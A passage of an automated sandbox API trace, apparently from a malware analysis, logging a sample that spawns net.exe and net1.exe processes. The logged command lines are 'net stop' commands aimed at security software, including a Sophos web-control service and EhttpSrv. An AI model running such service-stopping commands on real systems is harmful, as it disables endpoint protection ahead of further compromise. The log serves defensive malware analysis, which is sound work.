lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x12 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0xf [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.542] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x17 [0199.542] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0199.542] LocalFree (hMem=0x573f78) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x18 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0199.543] LocalFree (hMem=0x573f78) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x2a [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0199.543] LocalFree (hMem=0x573f78) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0199.543] LocalFree (hMem=0x573f78) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14㽸W寮\x14") returned 0x58 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0x184 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0xc7 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0x47 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0xc2 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0x319 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0x483 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0xa86 [0199.543] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0199.543] LocalFree (hMem=0x57b868) returned 0x0 [0199.543] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0x54 [0199.544] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0199.544] LocalFree (hMem=0x57b868) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14롨W寮\x14") returned 0xad [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0199.544] LocalFree (hMem=0x57b868) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14롨W寮\x14") returned 0x2e [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0199.544] LocalFree (hMem=0x573f78) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14㽸W寮\x14") returned 0x7d [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0199.544] LocalFree (hMem=0x57b868) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14롨W寮\x14") returned 0x26 [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0199.544] LocalFree (hMem=0x573f78) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0199.544] LocalFree (hMem=0x573f78) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x1b [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0199.544] LocalFree (hMem=0x573f78) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14㽸W寮\x14") returned 0xbe [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0199.544] LocalFree (hMem=0x57b868) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14롨W寮\x14") returned 0x33 [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0199.544] LocalFree (hMem=0x573f78) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x19 [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0199.544] LocalFree (hMem=0x573f78) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14㽸W寮\x14") returned 0xc1 [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0199.544] LocalFree (hMem=0x57b868) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14롨W寮\x14") returned 0x16 [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0199.544] LocalFree (hMem=0x573f78) returned 0x0 [0199.544] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x33 [0199.544] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="롨W⡋瓢婢\x14㽸W寮\x14") returned 0x234 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0199.545] LocalFree (hMem=0x57b868) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14롨W寮\x14") returned 0x13 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x14 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x16 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㶐W⡋瓢婢\x14㽸W寮\x14") returned 0x11 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573d90) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㶐W寮\x14") returned 0x14 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x12 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0xf [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.545] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x17 [0199.545] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.545] LocalFree (hMem=0x573f78) returned 0x0 [0199.546] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x18 [0199.546] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0199.546] LocalFree (hMem=0x573f78) returned 0x0 [0199.546] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x2a [0199.546] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0199.546] LocalFree (hMem=0x573f78) returned 0x0 [0199.546] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x14f9c8, nSize=0x0, Arguments=0x14f9c4 | out: lpBuffer="㽸W⡋瓢婢\x14㽸W寮\x14") returned 0x15 [0199.546] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0199.546] GetFileType (hFile=0x26c) returned 0x3 [0199.546] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x14f9e0 | out: lpMode=0x14f9e0) returned 0 [0199.560] GetConsoleOutputCP () returned 0x1b5 [0199.561] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0199.561] malloc (_Size=0x16) returned 0x2b2740 [0199.561] GetConsoleOutputCP () returned 0x1b5 [0199.561] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x2b2740, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0199.561] WriteFile (in: hFile=0x26c, lpBuffer=0x2b2740, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x14f9e4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14f9e4, lpOverlapped=0x0) returned 0 [0199.561] free (_Block=0x2b2740) [0199.561] LocalFree (hMem=0x573f78) returned 0x0 [0199.561] NetApiBufferFree (Buffer=0x571ca8) returned 0x0 [0199.562] NetApiBufferFree (Buffer=0x571cc0) returned 0x0 [0199.562] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Web Control ServiceΓÇ¥ /y" [0199.562] exit (_Code=1) Process: id = "158" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x1224f000" os_pid = "0x58c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop EhttpSrv /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 331 os_tid = 0x4b4 Process: id = "159" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x51d39000" os_pid = "0x48c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "158" os_parent_pid = "0x58c" cmd_line = "C:\\Windows\\system32\\net1 stop EhttpSrv /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 332 os_tid = 0x24c [0199.700] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xff8dc | out: lpSystemTimeAsFileTime=0xff8dc*(dwLowDateTime=0x40394b80, dwHighDateTime=0x1d57a87)) [0199.700] GetCurrentProcessId () returned 0x48c [0199.700] GetCurrentThreadId () returned 0x24c [0199.700] GetTickCount () returned 0x116b932 [0199.700] QueryPerformanceCounter (in: lpPerformanceCount=0xff8d4 | out: lpPerformanceCount=0xff8d4*=31998436236) returned 1 [0199.700] GetModuleHandleA (lpModuleName=0x0) returned 0x130000 [0199.700] __set_app_type (_Type=0x1) [0199.700] __p__fmode () returned 0x74eb31f4 [0199.700] __p__commode () returned 0x74eb31fc [0199.700] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13ffe6) returned 0x0 [0199.700] __getmainargs (in: _Argc=0x149064, _Argv=0x14906c, _Env=0x149068, _DoWildCard=0, _StartInfo=0x149024 | out: _Argc=0x149064, _Argv=0x14906c, _Env=0x149068) returned 0 [0199.700] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0199.701] GetConsoleOutputCP () returned 0x1b5 [0199.701] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x149080 | out: lpCPInfo=0x149080) returned 1 [0199.701] SetThreadUILanguage (LangId=0x0) returned 0x409 [0199.704] sprintf_s (in: _DstBuf=0xff894, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0199.704] setlocale (category=0, locale=".437") returned="English_United States.437" [0199.706] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0199.706] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0199.706] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EhttpSrv /y" [0199.706] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xff660, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0199.706] RtlAllocateHeap (HeapHandle=0x4e0000, Flags=0x0, Size=0x64) returned 0x4f3c00 [0199.706] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0199.706] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xff864 | out: Buffer=0xff864*=0x4f1c60) returned 0x0 [0199.706] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0xff864 | out: Buffer=0xff864*=0x4f1c78) returned 0x0 [0199.706] _fileno (_File=0x74eb2900) returned -2 [0199.706] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0199.706] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0199.706] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0199.706] _wcsicmp (_String1="config", _String2="stop") returned -16 [0199.707] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0199.707] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0199.707] _wcsicmp (_String1="file", _String2="stop") returned -13 [0199.707] _wcsicmp (_String1="files", _String2="stop") returned -13 [0199.707] _wcsicmp (_String1="group", _String2="stop") returned -12 [0199.707] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0199.707] _wcsicmp (_String1="help", _String2="stop") returned -11 [0199.707] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0199.707] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0199.707] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0199.707] _wcsicmp (_String1="session", _String2="stop") returned -15 [0199.707] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0199.707] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0199.707] _wcsicmp (_String1="share", _String2="stop") returned -12 [0199.707] _wcsicmp (_String1="start", _String2="stop") returned -14 [0199.707] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0199.707] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0199.707] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0199.707] _wcsicmp (_String1="accounts", _String2="EhttpSrv") returned -4 [0199.707] _wcsicmp (_String1="computer", _String2="EhttpSrv") returned -2 [0199.707] _wcsicmp (_String1="config", _String2="EhttpSrv") returned -2 [0199.707] _wcsicmp (_String1="continue", _String2="EhttpSrv") returned -2 [0199.707] _wcsicmp (_String1="cont", _String2="EhttpSrv") returned -2 [0199.707] _wcsicmp (_String1="file", _String2="EhttpSrv") returned 1 [0199.707] _wcsicmp (_String1="files", _String2="EhttpSrv") returned 1 [0199.707] _wcsicmp (_String1="group", _String2="EhttpSrv") returned 2 [0199.707] _wcsicmp (_String1="groups", _String2="EhttpSrv") returned 2 [0199.707] _wcsicmp (_String1="help", _String2="EhttpSrv") returned 3 [0199.707] _wcsicmp (_String1="helpmsg", _String2="EhttpSrv") returned 3 [0199.707] _wcsicmp (_String1="localgroup", _String2="EhttpSrv") returned 7 [0199.707] _wcsicmp (_String1="pause", _String2="EhttpSrv") returned 11 [0199.707] _wcsicmp (_String1="session", _String2="EhttpSrv") returned 14 [0199.707] _wcsicmp (_String1="sessions", _String2="EhttpSrv") returned 14 [0199.707] _wcsicmp (_String1="sess", _String2="EhttpSrv") returned 14 [0199.707] _wcsicmp (_String1="share", _String2="EhttpSrv") returned 14 [0199.707] _wcsicmp (_String1="start", _String2="EhttpSrv") returned 14 [0199.708] _wcsicmp (_String1="stats", _String2="EhttpSrv") returned 14 [0199.708] _wcsicmp (_String1="statistics", _String2="EhttpSrv") returned 14 [0199.708] _wcsicmp (_String1="stop", _String2="EhttpSrv") returned 14 [0199.708] _wcsicmp (_String1="time", _String2="EhttpSrv") returned 15 [0199.708] _wcsicmp (_String1="user", _String2="EhttpSrv") returned 16 [0199.708] _wcsicmp (_String1="users", _String2="EhttpSrv") returned 16 [0199.708] _wcsicmp (_String1="msg", _String2="EhttpSrv") returned 8 [0199.708] _wcsicmp (_String1="messenger", _String2="EhttpSrv") returned 8 [0199.708] _wcsicmp (_String1="receiver", _String2="EhttpSrv") returned 13 [0199.708] _wcsicmp (_String1="rcv", _String2="EhttpSrv") returned 13 [0199.708] _wcsicmp (_String1="netpopup", _String2="EhttpSrv") returned 9 [0199.708] _wcsicmp (_String1="redirector", _String2="EhttpSrv") returned 13 [0199.708] _wcsicmp (_String1="redir", _String2="EhttpSrv") returned 13 [0199.708] _wcsicmp (_String1="rdr", _String2="EhttpSrv") returned 13 [0199.708] _wcsicmp (_String1="workstation", _String2="EhttpSrv") returned 18 [0199.708] _wcsicmp (_String1="work", _String2="EhttpSrv") returned 18 [0199.708] _wcsicmp (_String1="wksta", _String2="EhttpSrv") returned 18 [0199.708] _wcsicmp (_String1="prdr", _String2="EhttpSrv") returned 11 [0199.708] _wcsicmp (_String1="devrdr", _String2="EhttpSrv") returned -1 [0199.708] _wcsicmp (_String1="lanmanworkstation", _String2="EhttpSrv") returned 7 [0199.708] _wcsicmp (_String1="server", _String2="EhttpSrv") returned 14 [0199.708] _wcsicmp (_String1="svr", _String2="EhttpSrv") returned 14 [0199.708] _wcsicmp (_String1="srv", _String2="EhttpSrv") returned 14 [0199.708] _wcsicmp (_String1="lanmanserver", _String2="EhttpSrv") returned 7 [0199.708] _wcsicmp (_String1="alerter", _String2="EhttpSrv") returned -4 [0199.708] _wcsicmp (_String1="netlogon", 